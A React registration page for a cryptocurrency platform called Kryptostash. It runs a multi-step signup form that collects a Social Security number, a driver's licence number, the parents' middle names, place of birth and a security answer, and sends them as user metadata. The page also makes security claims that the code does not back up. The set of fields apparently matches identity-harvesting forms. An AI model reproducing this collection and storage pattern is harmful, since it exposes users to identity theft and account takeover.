import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import Header from '../../components/ui/Header';
import Icon from '../../components/AppIcon';
import ProgressIndicator from './components/ProgressIndicator';
import PersonalInfoStep from './components/PersonalInfoStep';
import IdentityVerificationStep from './components/IdentityVerificationStep';
import SecuritySetupStep from './components/SecuritySetupStep';
import ReviewStep from './components/ReviewStep';
import SuccessModal from './components/SuccessModal';
import { useAuth } from '../../contexts/AuthContext';

const Registration = () => {
  const navigate = useNavigate();
  const { signUp } = useAuth();
  const [currentStep, setCurrentStep] = useState(1);
  const [showSuccess, setShowSuccess] = useState(false);
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [error, setError] = useState('');
  const [formData, setFormData] = useState({
    firstName: '',
    lastName: '',
    email: '',
    phone: '',
    dateOfBirth: '',
    country: '',
    address: '',
    city: '',
    postalCode: '',
    driversLicense: '',
    ssn: '',
    fatherMiddleName: '',
    motherMiddleName: '',
    placeOfBirth: '',
    password: '',
    confirmPassword: '',
    securityQuestion: '',
    securityAnswer: '',
    enable2FA: false
  });

  const steps = [
    { id: 1, label: 'Personal Info', description: 'Basic details' },
    { id: 2, label: 'Identity', description: 'Verification' },
    { id: 3, label: 'Security', description: 'Account setup' },
    { id: 4, label: 'Review', description: 'Confirm details' }
  ];

  const handleNext = () => {
    if (currentStep < steps?.length) {
      setCurrentStep(currentStep + 1);
      window.scrollTo({ top: 0, behavior: 'smooth' });
    }
  };

  const handleBack = () => {
    if (currentStep > 1) {
      setCurrentStep(currentStep - 1);
      window.scrollTo({ top: 0, behavior: 'smooth' });
    }
  };

  const handleSubmit = async () => {
    setIsSubmitting(true);
    setError('');

    try {
      const userData = {
        first_name: formData?.firstName,
        last_name: formData?.lastName,
        phone: formData?.phone,
        date_of_birth: formData?.dateOfBirth,
        country: formData?.country,
        address: formData?.address,
        city: formData?.city,
        postal_code: formData?.postalCode,
        drivers_license: formData?.driversLicense,
        ssn: formData?.ssn,
        fathers_middle_name: formData?.fatherMiddleName,
        mothers_middle_name: formData?.motherMiddleName,
        place_of_birth: formData?.placeOfBirth,
        security_question: formData?.securityQuestion,
        security_answer: formData?.securityAnswer,
        enable_2fa: formData?.enable2FA
      };

      const { data, error: signUpError } = await signUp(
        formData?.email,
        formData?.password,
        userData
      );

      if (signUpError) {
        setError(signUpError?.message || 'Registration failed. Please try again.');
        setIsSubmitting(false);
        return;
      }

      setShowSuccess(true);
    } catch (err) {
      setError(err?.message || 'An unexpected error occurred. Please try again.');
    } finally {
      setIsSubmitting(false);
    }
  };

  const renderStep = () => {
    switch (currentStep) {
      case 1:
        return (
          <PersonalInfoStep
            formData={formData}
            onUpdate={setFormData}
            onNext={handleNext}
          />
        );
      case 2:
        return (
          <IdentityVerificationStep
            formData={formData}
            onUpdate={setFormData}
            onNext={handleNext}
            onBack={handleBack}
          />
        );
      case 3:
        return (
          <SecuritySetupStep
            formData={formData}
            onUpdate={setFormData}
            onNext={handleNext}
            onBack={handleBack}
          />
        );
      case 4:
        return (
          <ReviewStep
            formData={formData}
            onSubmit={handleSubmit}
            onBack={handleBack}
          />
        );
      default:
        return null;
    }
  };

  return (
    <div className="min-h-screen bg-[var(--color-background)]">
      <Header />
      <main className="pt-20 pb-12 md:pb-16 lg:pb-20">
        <div className="max-w-4xl mx-auto px-4 md:px-6 lg:px-8">
          <div className="text-center mb-8 md:mb-10 lg:mb-12">
            <div className="inline-flex items-center justify-center w-16 h-16 md:w-20 md:h-20 rounded-2xl bg-gradient-to-br from-[var(--color-primary)] to-[var(--color-secondary)] mb-4 md:mb-6">
              <Icon name="Lock" size={32} color="#FFFFFF" />
            </div>
            <h1 className="text-3xl md:text-4xl lg:text-5xl font-bold text-[var(--color-foreground)] mb-3 md:mb-4">
              Create Your Account
            </h1>
            <p className="text-base md:text-lg lg:text-xl text-[var(--color-muted-foreground)] max-w-2xl mx-auto">
              Join Kryptostash and start your secure cryptocurrency investment journey with bank-level security and compliance
            </p>
          </div>

          <ProgressIndicator currentStep={currentStep} steps={steps} />

          <div className="bg-[var(--color-card)] rounded-2xl shadow-lg border border-[var(--color-border)] p-4 md:p-6 lg:p-8 mb-6 md:mb-8">
            <div className="flex items-center gap-3 mb-6">
              <div className="w-10 h-10 md:w-12 md:h-12 rounded-lg bg-[var(--color-primary)]/10 flex items-center justify-center flex-shrink-0">
                <Icon name="Shield" size={20} color="var(--color-primary)" />
              </div>
              <div>
                <h2 className="text-lg md:text-xl font-semibold text-[var(--color-foreground)]">
                  Secure Registration Process
                </h2>
                <p className="text-sm md:text-base text-[var(--color-muted-foreground)]">
                  Your information is encrypted and protected
                </p>
              </div>
            </div>

            <div className="grid grid-cols-1 md:grid-cols-3 gap-4">
              <div className="flex items-start gap-3 p-4 bg-[var(--color-muted)] rounded-lg">
                <Icon name="Lock" size={20} color="var(--color-success)" className="flex-shrink-0 mt-0.5" />
                <div>
                  <p className="text-sm font-medium text-[var(--color-foreground)]">256-bit Encryption</p>
                  <p className="text-xs text-[var(--color-muted-foreground)] mt-1">Bank-level security</p>
                </div>
              </div>
              <div className="flex items-start gap-3 p-4 bg-[var(--color-muted)] rounded-lg">
                <Icon name="CheckCircle" size={20} color="var(--color-success)" className="flex-shrink-0 mt-0.5" />
                <div>
                  <p className="text-sm font-medium text-[var(--color-foreground)]">KYC Compliant</p>
                  <p className="text-xs text-[var(--color-muted-foreground)] mt-1">Regulatory standards</p>
                </div>
              </div>
              <div className="flex items-start gap-3 p-4 bg-[var(--color-muted)] rounded-lg">
                <Icon name="Shield" size={20} color="var(--color-success)" className="flex-shrink-0 mt-0.5" />
                <div>
                  <p className="text-sm font-medium text-[var(--color-foreground)]">Data Protected</p>
                  <p className="text-xs text-[var(--color-muted-foreground)] mt-1">Privacy guaranteed</p>
                </div>
              </div>
            </div>
          </div>

          {error && (
            <div className="mb-6 p-4 bg-red-50 border border-red-200 rounded-lg">
              <div className="flex items-center gap-2">
                <Icon name="AlertCircle" size={20} color="#dc2626" />
                <p className="text-sm text-red-600">{error}</p>
              </div>
            </div>
          )}

          {renderStep()}

          <div className="mt-8 md:mt-10 text-center">
            <p className="text-xs md:text-sm text-[var(--color-muted-foreground)]">
              Already have an account?{' '}
              <a href="/homepage" className="text-[var(--color-primary)] hover:underline font-medium">
                Sign in here
              </a>
            </p>
          </div>
        </div>
      </main>
      <footer className="border-t border-[var(--color-border)] bg-[var(--color-card)] py-6 md:py-8">
        <div className="max-w-7xl mx-auto px-4 md:px-6 lg:px-8">
          <div className="flex flex-col md:flex-row items-center justify-between gap-4">
            <p className="text-xs md:text-sm text-[var(--color-muted-foreground)]">
              © {new Date()?.getFullYear()} Kryptostash. All rights reserved.
            </p>
            <div className="flex items-center gap-4 md:gap-6">
              <a href="#" className="text-xs md:text-sm text-[var(--color-muted-foreground)] hover:text-[var(--color-foreground)]">
                Privacy Policy
              </a>
              <a href="#" className="text-xs md:text-sm text-[var(--color-muted-foreground)] hover:text-[var(--color-foreground)]">
                Terms of Service
              </a>
              <a href="#" className="text-xs md:text-sm text-[var(--color-muted-foreground)] hover:text-[var(--color-foreground)]">
                Support
              </a>
            </div>
          </div>
        </div>
      </footer>
      <SuccessModal isOpen={showSuccess} />
    </div>
  );
};

export default Registration;